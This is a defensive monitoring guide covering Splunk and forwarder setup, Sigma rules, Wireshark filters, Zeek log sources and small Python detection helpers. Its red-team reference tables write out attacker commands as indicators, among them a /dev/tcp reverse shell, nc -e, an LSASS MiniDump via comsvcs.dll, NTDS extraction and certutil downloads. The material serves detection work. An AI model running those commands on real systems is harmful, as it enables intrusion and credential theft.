Monitoring Guide
Install Splunk Enterprise, set up forwarders on Linux & Windows, and collect logs centrally.
Step-by-step setup for the blue team SIEM stack: Splunk server, Universal Forwarder on every Linux and Windows host, and the configuration files that wire it all together · no hardening distractions.
Architecture Overview
All clients and servers send their logs via Universal Forwarder (UF) to the central Splunk server. There they are indexed and searchable through the Web UI.
Diagram: Linux hosts (syslog, auth, app logs) and Windows hosts (Event Logs) → Universal Forwarder → Splunk server, port 9997 (receive), port 8000 (Web UI).
Install Splunk Enterprise
Run on the dedicated Splunk server (Ubuntu/Debian).
1 · Download the .deb package
```bash
wget -O splunk-10.2.2-80b90d638de6-linux-amd64.deb \
  "https://download.splunk.com/products/splunk/releases/10.2.2/linux/splunk-10.2.2-80b90d638de6-linux-amd64.deb"
```
2 · Install the package
```bash
sudo dpkg -i splunk-10.2.2-80b90d638de6-linux-amd64.deb
```
Start Splunk
First start (accept license)
```bash
sudo /opt/splunk/bin/splunk start --accept-license
```
If Splunk reports that the command must be run as root, append the --answer-yes flag or run it directly as root:
```bash
sudo /opt/splunk/bin/splunk start --accept-license --answer-yes

# Alternative: fully as root
sudo su -
/opt/splunk/bin/splunk start --accept-license --answer-yes
```
Enable autostart on boot
```bash
sudo /opt/splunk/bin/splunk enable boot-start -user splunk
# or as root without a dedicated user:
sudo /opt/splunk/bin/splunk enable boot-start
```
Web UI login: admin / the password set at first start.
Ports & Firewall
These ports must be open on the Splunk server:
| Port | Protocol | Usage |
|---|---|---|
| 8000 | TCP | Web UI (browser access) |
| 9997 | TCP | Receiving · forwarders send here |
| 8089 | TCP | Management API / Splunkd |
| 8088 | TCP | HTTP Event Collector (HEC, optional) |
```bash
sudo ufw allow 8000/tcp
sudo ufw allow 9997/tcp
sudo ufw allow 8089/tcp
```
Enable receiving in the Web UI
Settings → Forwarding and receiving → Configure receiving → New → Port 9997 → Save.
Universal Forwarder · Linux Client
1 · Download & install the UF
Use the same version as the server (10.2.2). Copy the wget command from the download page, run it, then install the package:
```bash
# Copy the wget command from the download page, then:
sudo dpkg -i splunkforwarder-<version>-linux-amd64.deb
```
2 · Start forwarder and set the receiving server
```bash
sudo /opt/splunkforwarder/bin/splunk start --accept-license --answer-yes
# Add the Splunk server as the receiver (adjust the IP!)
sudo /opt/splunkforwarder/bin/splunk add forward-server \
  <SPLUNK-SERVER-IP>:9997 -auth admin:changeme
```
3 · Add log sources
```bash
# Syslog
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/syslog \
  -index main -sourcetype syslog
# Auth log (SSH logins, sudo etc.)
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/auth.log \
  -index main -sourcetype linux_secure
# Kernel log
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/kern.log \
  -index main -sourcetype syslog
```
4 · Restart the forwarder
```bash
sudo /opt/splunkforwarder/bin/splunk restart
```
Universal Forwarder · Windows Client
1 · Download the installer
Download link (Windows .msi x64) → splunk.com/en_us/download/universal-forwarder
2 · Install via MSI wizard
- 1 Double-click the MSI → "Next"
- 2 Accept the license
- 3 Set local admin user (e.g. admin / strong password)
- 4 Leave Deployment Server empty (set later)
- 5 Receiving Indexer: enter the Splunk server IP + port 9997
- 6 "Install" → done
3 · Or: silent install via PowerShell
```powershell
# MSI in the same directory as the PS script
msiexec.exe /i splunkforwarder-10.2.2-x64.msi AGREETOLICENSE=Yes `
  SPLUNKUSERNAME=admin SPLUNKPASSWORD=changeme `
  RECEIVING_INDEXER="<SPLUNK-SERVER-IP>:9997" `
  /quiet /L*v splunk_install.log
```
4 · Enable Windows Event Logs
Either in the Splunk Web UI of the forwarder (http://localhost:8000) or directly via CLI:
```powershell
# Add Windows Event Logs (the wineventlog index must exist on the server,
# see Index & Sourcetype; the searches below expect index=wineventlog)
& "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" `
  add monitor "C:\Windows\System32\winevt\Logs\Security.evtx" `
  -index wineventlog -sourcetype WinEventLog:Security
& "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" `
  add monitor "C:\Windows\System32\winevt\Logs\System.evtx" `
  -index wineventlog -sourcetype WinEventLog:System
```
Forward Server Logs
For servers (e.g. web servers, DB servers) the same UF principle applies as for Linux clients. Typical log paths:
```bash
# Apache / Nginx
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log \
  -index web -sourcetype apache_combined
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/nginx/access.log \
  -index web -sourcetype nginx_access
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/nginx/error.log \
  -index web -sourcetype nginx_error

# MySQL error log
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log \
  -index db -sourcetype mysql:error
# PostgreSQL
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/postgresql/ \
  -index db -sourcetype postgresql
```
inputs.conf (manual)
Instead of CLI commands, you can edit /opt/splunkforwarder/etc/system/local/inputs.conf directly on the forwarder:
```ini
# Syslog
[monitor:///var/log/syslog]
index = main
sourcetype = syslog
disabled = false

# Auth
[monitor:///var/log/auth.log]
index = main
sourcetype = linux_secure
disabled = false

# Apache
[monitor:///var/log/apache2/access.log]
index = web
sourcetype = apache_combined
disabled = false
```
outputs.conf
Ensures the forwarder sends to the correct server. Path: /opt/splunkforwarder/etc/system/local/outputs.conf
```ini
[tcpout]
defaultGroup = my_indexers

[tcpout:my_indexers]
server = <SPLUNK-SERVER-IP>:9997
```
Index & Sourcetype
Create the index on the Splunk server
Web UI → Settings → Indexes → New Index
| Name | Content |
|---|---|
| main | Linux syslog, auth · general |
| web | Apache, Nginx access/error logs |
| db | MySQL, PostgreSQL logs |
| wineventlog | Windows Event Logs |
Data sent without an explicit index lands in the main index automatically. For exercises it's fine to dump everything into main · but separate indexes help searching enormously.
First Searches in the Web UI
After logging in at http://<SPLUNK-SERVER-IP>:8000 → Search & Reporting:
```
index=* earliest=-15m
```
```
index=main sourcetype=linux_secure "Failed password"
| stats count by src_ip, user
| sort -count
```
```
index=wineventlog EventCode=4625
| stats count by Account_Name, src_ip
| sort -count
```
```
index=* earliest=-1h
| stats count by host, sourcetype
| sort -count
| head 10
```
Sigma Rules
Sigma is a platform-agnostic detection format · the same rule can be converted to Splunk, Elastic, Sentinel, Chronicle, etc. The rules below cover the same intel-driven techniques as the Targeted Monitoring page but in vendor-neutral form. Drop them into sigma/ in your repo and convert with sigmac.
Mimikatz · LSASS access
```yaml
title: LSASS Memory Access by Non-System Process
status: experimental
logsource:
  product: windows
  category: process_access
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess|contains:
      - '0x1010'
      - '0x1410'
      - '0x1438'
      - '0x143a'
  filter:
    SourceImage|startswith:
      - 'C:\Windows\System32\'
      - 'C:\Windows\SysWOW64\'
  condition: selection and not filter
falsepositives:
  - AV/EDR solutions
level: critical
tags:
  - attack.credential_access
  - attack.t1003.001
```
Kerberoasting · RC4 downgrade
```yaml
title: Kerberoasting RC4 Downgrade
status: stable
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'
    TicketOptions: '0x40810000'
  filter:
    # exclude computer accounts (names end with $); Sigma has no
    # "not-startswith" modifier, so the exclusion goes into a filter
    ServiceName|endswith: '$'
  condition: selection and not filter
falsepositives:
  - Legacy systems requiring RC4
level: high
tags:
  - attack.credential_access
  - attack.t1558.003
```
Pass-the-Hash · NTLM logon
```yaml
title: Pass-the-Hash NTLM Logon
status: stable
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4624
    LogonType: 3
    AuthenticationPackageName: 'NTLM'
    LogonProcessName: 'NtLmSsp'
  filter:
    AccountName|endswith: '$'
  condition: selection and not filter
falsepositives:
  - Legacy NTLM authentication
level: high
tags:
  - attack.lateral_movement
  - attack.t1550.002
```
Golden Ticket · krbtgt activity
```yaml
title: Golden Ticket - krbtgt Account Activity
status: experimental
logsource:
  product: windows
  service: security
detection:
  selection_tgt:
    EventID: 4769
    ServiceName: 'krbtgt'
  selection_anomaly:
    EventID: 4624
    LogonType: 3
    KeyLength: 0
  condition: selection_tgt or selection_anomaly
level: critical
tags:
  - attack.privilege_escalation
  - attack.t1558.001
```
Metasploit · default reverse shell ports
```yaml
title: Metasploit Default Reverse Shell Port
status: experimental
logsource:
  product: windows
  category: network_connection
detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 4444
      - 4445
      - 4443
  filter:
    Image|startswith:
      - 'C:\Windows\'
      - 'C:\Program Files\'
  condition: selection and not filter
level: high
tags:
  - attack.command_and_control
  - attack.t1571
```
Suspicious PowerShell execution
```yaml
title: Suspicious PowerShell Execution
status: stable
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
      - '-NoProfile'
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  condition: selection
level: high
tags:
  - attack.execution
  - attack.t1059.001
```
NTDS dump · ntdsutil / vssadmin
```yaml
title: NTDS Dump via ntdsutil or vssadmin
status: stable
logsource:
  product: windows
  category: process_creation
detection:
  selection_ntdsutil:
    Image|endswith: '\ntdsutil.exe'
    CommandLine|contains: 'ac i ntds'
  selection_vss:
    Image|endswith: '\vssadmin.exe'
    CommandLine|contains:
      - 'create shadow'
      - 'list shadows'
  condition: selection_ntdsutil or selection_vss
level: critical
tags:
  - attack.credential_access
  - attack.t1003.003
```
Ruby script execution from non-standard path
```yaml
title: Ruby Script Execution from Non-Standard Path
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\ruby.exe'
    CommandLine|contains: '.rb'
  filter:
    CommandLine|contains:
      - 'C:\Ruby'
      - 'C:\Program Files\Ruby'
  condition: selection and not filter
level: medium
tags:
  - attack.execution
  - attack.t1059
```
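To see how the selection/filter/condition logic of the rules above actually evaluates, here is an added example (not part of the guide or of any Sigma tooling): a small evaluator for the Sigma subset these rules use, run over constructed Windows events for the Pass-the-Hash and NTDS-dump rules. Event field names and values are assumptions that mirror the rules, not real log data.

```python
# Added example, not from the guide: a minimal evaluator for the Sigma subset
# the rules above use (modifiers contains/startswith/endswith, list values as
# any-of, conditions "a", "a and not b", "a or b"), run on constructed events.
import re

def _match_field(event, key, expected):
    field, _, mod = key.partition("|")            # e.g. "Image|endswith"
    value = str(event.get(field, "")).lower()     # Sigma matching is case-insensitive
    wanted = expected if isinstance(expected, list) else [expected]
    tests = {
        "": lambda w: value == w,
        "contains": lambda w: w in value,
        "startswith": lambda w: value.startswith(w),
        "endswith": lambda w: value.endswith(w),
    }
    return any(tests[mod](str(w).lower()) for w in wanted)  # list values are OR-ed

def _match_selection(event, selection):
    return all(_match_field(event, k, v) for k, v in selection.items())  # fields are AND-ed

def sigma_match(rule, event):
    """Evaluate rule['detection'] against a flat event dict; True means the rule fires."""
    det = rule["detection"]
    hits = {n: _match_selection(event, s) for n, s in det.items() if n != "condition"}
    cond = det["condition"].strip()
    if m := re.fullmatch(r"(\w+) and not (\w+)", cond):
        return hits[m.group(1)] and not hits[m.group(2)]
    if m := re.fullmatch(r"(\w+) or (\w+)", cond):
        return hits[m.group(1)] or hits[m.group(2)]
    return hits[cond]

# The guide's Pass-the-Hash and NTDS-dump rules, as the dict form of their YAML.
PTH_RULE = {"detection": {
    "selection": {"EventID": 4624, "LogonType": 3,
                  "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp"},
    "filter": {"AccountName|endswith": "$"},
    "condition": "selection and not filter"}}
NTDS_RULE = {"detection": {
    "selection_ntdsutil": {"Image|endswith": "\\ntdsutil.exe", "CommandLine|contains": "ac i ntds"},
    "selection_vss": {"Image|endswith": "\\vssadmin.exe",
                      "CommandLine|contains": ["create shadow", "list shadows"]},
    "condition": "selection_ntdsutil or selection_vss"}}

# Constructed sample events (not real log data).
USER_NTLM = {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
             "LogonProcessName": "NtLmSsp", "AccountName": "jdoe"}
MACHINE_NTLM = dict(USER_NTLM, AccountName="WS01$")   # computer account: excluded by the filter
KERB_LOGON = dict(USER_NTLM, AuthenticationPackageName="Kerberos", LogonProcessName="Kerberos")
VSS_LIST = {"Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows"}
VSS_OTHER = {"Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list writers"}

def run_demo():  # returns ([PtH verdicts], [NTDS verdicts]) for the sample events above
    return ([sigma_match(PTH_RULE, e) for e in (USER_NTLM, MACHINE_NTLM, KERB_LOGON)],
            [sigma_match(NTDS_RULE, e) for e in (VSS_LIST, VSS_OTHER)])
```

The evaluator only covers what these rules need; real converters (sigmac, pySigma) also handle `all of`, wildcards, regex and many more modifiers.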
Wireshark Filters
Display filters for live captures or PCAP review. Combine with Statistics → I/O Graph or Conversations for time-based and per-host views.
Metasploit reverse-shell ports
tcp.port == 4444 or tcp.port == 4445 or tcp.port == 4443
Meterpreter HTTP/S beacon · default User-Agents
(http.request or http.response) and (http.user_agent contains "Mozilla/4.0 (compatible; MSIE 6.0" or http.user_agent contains "Mozilla/5.0 (Windows NT 6.1; Trident")
SMB lateral movement
smb2.cmd == 0x0005 and smb2.flags.response == 0
Kerberos RC4 downgrade on the wire
kerberos.etype == 23
LDAP enumeration · large queries
ldap and ldap.searchRequest and frame.len > 200
DNS exfiltration · long / unusual queries
dns.qry.name matches "[a-z0-9]{20,}\." and dns.flags.response == 0
Pass-the-Hash on the wire
ntlmssp.auth.ntresponse and not ntlmssp.negotiate
Outbound HTTP toward unknown ranges
http.request and not (ip.dst == <your_internal_range>)
Beacon / regular outbound TCP
tcp.flags == 0x002 and ip.dst != <internal_range>
Network Log Sources (Zeek / IDS)
If you have a network-tap host running Zeek (formerly Bro) or Suricata, forward these logs to Splunk. They give you visibility the endpoint UF can't.
| Log | Use it for |
|---|---|
| conn.log | Every TCP/UDP/ICMP flow · port scans, SYN-only states, beacon timing |
| http.log | HTTP method, URI, User-Agent, status · web2pdf and Meterpreter UAs |
| ssl.log + x509.log | JA3/JA3S fingerprints, self-signed certs, recent issuance |
| dns.log | TXT/NULL volume, label entropy, recent-domain resolution |
| smb_files.log + smb_mapping.log | Files written to ADMIN$ / C$, IPC$ from unexpected hosts |
| kerberos.log | Service ticket requests, encryption type, anomalous principals |
| notice.log | Zeek's own alerts · scan detection, weird activity, SSL anomalies |
Forward Zeek logs to Splunk
```bash
# Zeek
sudo /opt/splunkforwarder/bin/splunk add monitor /opt/zeek/logs/current/ \
  -index network -sourcetype zeek
# Suricata EVE JSON
sudo /opt/splunkforwarder/bin/splunk add monitor /var/log/suricata/eve.json \
  -index ids -sourcetype suricata:eve
```
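The "label entropy" check listed for dns.log above, as an added example that is not from the guide or from Zeek: it scores each query's longest label by length (the same idea as the Wireshark `[a-z0-9]{20,}` filter) and by Shannon entropy, so that long but repetitive names do not alert. The dns.log sample is constructed and reduced to the columns needed here.

```python
# Added example, not from the guide: score query names from a Zeek dns.log by
# longest-label length and Shannon entropy (the "label entropy" check listed for
# dns.log above; the length part mirrors the Wireshark filter's [a-z0-9]{20,}).
# The log below is constructed and reduced to the columns needed here; a real
# dns.log carries many more fields and a #separator/#types header.
import math
from collections import Counter

SAMPLE_DNS_LOG = """\
#fields\tts\tid.orig_h\tquery\tqtype_name
1700000000.10\t10.0.0.5\twww.example.com\tA
1700000000.20\t10.0.0.5\tcdn1.example.net\tA
1700000000.30\t10.0.0.7\t3a9f1c7e2b84d6a0f5e1c9b7d2a4f8e6.exfil.example\tTXT
1700000000.40\t10.0.0.7\tzq8v1kx0pw7ryt3mlb6sd2nh.exfil.example\tTXT
1700000000.50\t10.0.0.9\tserverserverserverserver.example.org\tA
"""

def shannon_entropy(s):
    """Bits per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def parse_dns_log(text):
    """Yield one dict per record, keyed by the names in the #fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split("\t")))

def score_query(qname):
    """Return (longest label, its length, its entropy in bits/char)."""
    label = max(qname.rstrip(".").split("."), key=len)
    return label, len(label), shannon_entropy(label)

def suspicious_queries(text, min_len=20, min_entropy=3.5):
    """Records whose longest label is both long and high-entropy. The entropy
    cut keeps long-but-repetitive names (serverserver...) out of the alert."""
    hits = []
    for rec in parse_dns_log(text):
        label, length, ent = score_query(rec["query"])
        if length >= min_len and ent >= min_entropy:
            hits.append((rec["id.orig_h"], rec["query"], round(ent, 2)))
    return hits
```

The thresholds are assumptions to tune per environment; hex-encoded data sits near 4 bits/char and base32/base36 labels higher, while human-readable labels usually stay well below 3.5.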
Additional Splunk Queries
A few extras from the intel sheet that complement the Dashboards & Alerts and Targeted Monitoring pages.
Suspicious child process · shell spawned by office / browser / script host
index=wineventlog EventCode=4688
ParentImage IN ("*\\cmd.exe", "*\\powershell.exe", "*\\wscript.exe", "*\\cscript.exe")
NewProcessName IN ("*\\net.exe", "*\\whoami.exe", "*\\ipconfig.exe", "*\\systeminfo.exe")
| table _time, Computer, ParentImage, NewProcessName, CommandLine
PowerShell Script Block Logging · known offensive cmdlets
index=wineventlog EventCode=4104
ScriptBlockText IN ("*Invoke-Mimikatz*", "*Invoke-ReflectivePEInjection*",
"*Get-GPPPassword*", "*Invoke-Shellcode*")
| table _time, Computer, ScriptBlockText
Privileged group changes · annotated
index=wineventlog EventCode IN (4720, 4728, 4732, 4756)
| eval action=case(
EventCode=4720, "User account created",
EventCode=4728, "Added to global privileged group",
EventCode=4732, "Added to local privileged group",
EventCode=4756, "Added to universal group"
)
| table _time, Computer, SubjectUserName, TargetUserName, action
NTDS dump · annotated severity
index=wineventlog EventCode=4688
NewProcessName IN ("*\\ntdsutil.exe", "*\\vssadmin.exe")
| eval alert=case(
like(CommandLine, "%ac i ntds%"), "NTDS dump via ntdsutil · CRITICAL",
like(CommandLine, "%create shadow%"), "VSS Shadow Copy created · HIGH",
like(CommandLine, "%list shadows%"), "VSS enumeration · MEDIUM",
true(), "Check manually"
)
| table _time, Computer, CommandLine, alert
Know Thy Enemy · Red Team Tactics Reference
A condensed view of common offensive techniques the red team may run · pulled from threat-hunter reference material. For each one: the MITRE ID, the log source where it shows up, and the attack indicators (IOA) you'd see. This is supplementary context · not a detection list (those live above and on the Targeted Monitoring page).
Linux · Privilege Escalation
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| SUID abuse (find) | T1548.001 | auditd EXECVE / SYSCALL | find -exec /bin/sh -p \; from non-root reaching euid=0 |
| Sudo misconfig (GTFOBins) | T1548.003 | auth.log + auditd | sudo vim/less/awk/python + shell escape (:!/bin/sh, os.system) |
| PATH hijacking | T1574.007 | auditd EXECVE env array | writable dir prepended to PATH; ls/cat/service resolved from /tmp |
| DirtyPipe | T1068 (CVE-2022-0847) | auditd file-write | unprivileged write to /etc/passwd or /etc/shadow on kernel ≤ 5.16.11 |
| PwnKit (pkexec) | T1068 (CVE-2021-4034) | auditd EXECVE + polkit | /usr/bin/pkexec with argc=0; GCONV_PATH=. dir + rogue .so |
| LD_PRELOAD hijack | T1574.006 | auditd env array + openat | sudo with LD_PRELOAD=/tmp/x.so; library outside /lib or /usr/lib |
Linux · Execution & Defense Evasion
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Reverse shell patterns | T1059.004 | auditd + netflow | bash -i >& /dev/tcp/IP/PORT 0>&1; nc -e; socat EXEC:/bin/bash |
| ptrace process injection | T1055.008 | auditd ptrace syscall | PTRACE_ATTACH on system process; write to /proc/PID/mem |
| Auditd tampering | T1562.001 | syslog + auditd self | systemctl stop auditd, auditctl -D, truncate audit.log |
| Log4Shell | T1190 (CVE-2021-44228) | WAF + access_log + DNS | ${jndi:ldap://} in headers / params; outbound LDAP/RMI from JVM |
| bash_history wipe | T1070.003 | auditd unlink/openat | history -c; ln -sf /dev/null ~/.bash_history; HISTFILE=/dev/null |
| Container log-driver swap | T1562 | auditd write + Docker | daemon.json set to "log-driver":"none"; --log-driver=none |
Linux · Persistence
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Cron wildcard injection | T1053.003 | auditd PATH + cron syslog | files named like flags (--checkpoint=1) in dirs that tar/rsync cron over |
| Systemd timer abuse | T1053.006 | journalctl + auditd | new .timer + .service outside package mgmt; user timer from /tmp |
| SSH authorized_keys backdoor | T1098.004 | auditd write + auth.log | append to ~/.ssh/authorized_keys from non-interactive context (web/cron) |
| Kernel module rootkit | T1547.006 | auditd init_module + dmesg | insmod of unsigned .ko; module in lsmod but missing from /proc/modules |
| SSH private key theft | T1552.004 | auditd openat on .ssh | web/service account reading ~/.ssh/id_* |
Windows · Credential Access
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| LSASS dump (comsvcs.dll) | T1003.001 | Sysmon 1 / 10, Security 4688 | rundll32 comsvcs.dll, MiniDump <LSASS_PID> lsass.dmp full |
| DCSync | T1003.006 | Security 4662 on DC | non-DC machine triggering Replication-Get-Changes-All GUID |
| NTDS.dit extraction | T1003.003 | Sysmon 1 + 4688 + VSS | ntdsutil "ac i ntds" "ifm" "create full ..."; vssadmin create shadow + copy |
| Kerberoasting | T1558.003 | Security 4769 | multiple TGS-REQ for different SPNs in seconds; encryption type 0x17 (RC4) |
| AS-REP roasting | T1558.004 | Security 4768 | TGT request with PreAuth=0; account flag "Do not require Kerberos preauth" |
| Pass-the-Hash | T1550.002 | Security 4624 / 4648 | Logon Type 9 or 3 + NTLM + Key Length 0 |
| Pass-the-Ticket | T1550.003 | Security 4624 / 4768 / 4769 | ticket injected into alt LUID; Account Name ≠ Client Name in PAC |
| Golden Ticket | T1558.001 | Security 4624 / 4672 / 4769 | 4769 with no preceding 4768; lifetime > policy max; SID-history Enterprise Admin |
Windows · Execution & Lateral Movement
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| PowerShell encoded command | T1059.001 | 4104 ScriptBlock + 4688 | -e/-enc/-EncodedCommand + Base64; AMSI bypass strings; IEX (... DownloadString) |
| WMI lateral movement | T1047 | 4688 + WMI 5861 + Sysmon 1/3 | wmic /node:TARGET process call create; WmiPrvSE.exe spawning cmd/powershell |
| LOLBin: certutil | T1140 / T1105 | Sysmon 1 / 3, 4688 | certutil -urlcache -split -f http://...; certutil -decode producing PE |
Windows · Persistence
| Technique | MITRE | Log Source | Attack Indicator |
|---|---|---|---|
| Scheduled task | T1053.005 | Security 4698 / 4702 / 4700, Sysmon 11 | schtasks /create with action in %TEMP% / AppData / UNC; SYSTEM run-as |
| Registry Run key | T1547.001 | Sysmon 12 / 13 / 14 | write to HKCU/HKLM ...\CurrentVersion\Run pointing to AppData/Temp/Public |
| Malicious service install | T1543.003 | System 7045, Security 4697 | sc create with binPath to unsigned exe / UNC / embedded PowerShell |
| BITS job abuse | T1197 | Bits-Client 59 / 60, Sysmon 3 | bitsadmin /create + /addfile from external URL; /SetNotifyCmdLine exec on done |
| UAC bypass · fodhelper | T1548.002 | Sysmon 12 / 13 + 1 | write to HKCU\Software\Classes\ms-settings\Shell\Open\command + run fodhelper.exe |